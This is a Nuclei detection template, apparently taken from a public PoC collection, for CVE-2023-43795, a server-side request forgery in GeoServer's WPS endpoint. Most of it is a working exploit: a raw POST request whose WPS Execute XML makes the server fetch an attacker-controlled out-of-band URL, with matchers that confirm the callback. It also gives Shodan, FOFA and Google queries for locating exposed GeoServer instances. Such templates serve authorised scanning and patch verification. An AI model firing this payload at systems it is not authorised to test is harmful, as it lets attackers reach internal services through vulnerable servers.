GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
PoC代码[已公开]
id: CVE-2023-43795
info:
name: GeoServer WPS - Server Side Request Forgery
author: DhiyaneshDK
severity: critical
description: |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
reference:
- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
- https://nvd.nist.gov/vuln/detail/CVE-2023-43795
- https://github.com/20142995/sectool
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43795
cwe-id: CWE-918
epss-score: 0.89551
epss-percentile: 0.99535
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: osgeo
product: geoserver
shodan-query:
- title:"GeoServer"
- http.title:"geoserver"
fofa-query:
- app="GeoServer"
- app="geoserver"
- title="geoserver"
google-query: intitle:"geoserver"
tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev
variables:
oast: "{{interactsh-url}}"
string: "{{to_lower(rand_text_alpha(4))}}"
value: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.opengis.net/wps/1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>JTS:area</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>geom</ows:Identifier>
<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
<wps:Header key="{{string}}" value="{{value}}"/>
</wps:Reference>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
payloads:
path:
- /wms
- /geoserver/wms
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
- status_code == 200
condition: and
# digest: 4a0a00473045022100eab7c355024699aa869244ffab64093000f282df793c6adbdb1cfa2cabff579302205714718becefc207bdd69d46f1e8fe087debcc713db6a3263781cb2475ef3817:922c64590222798bb761d5b6d8e72950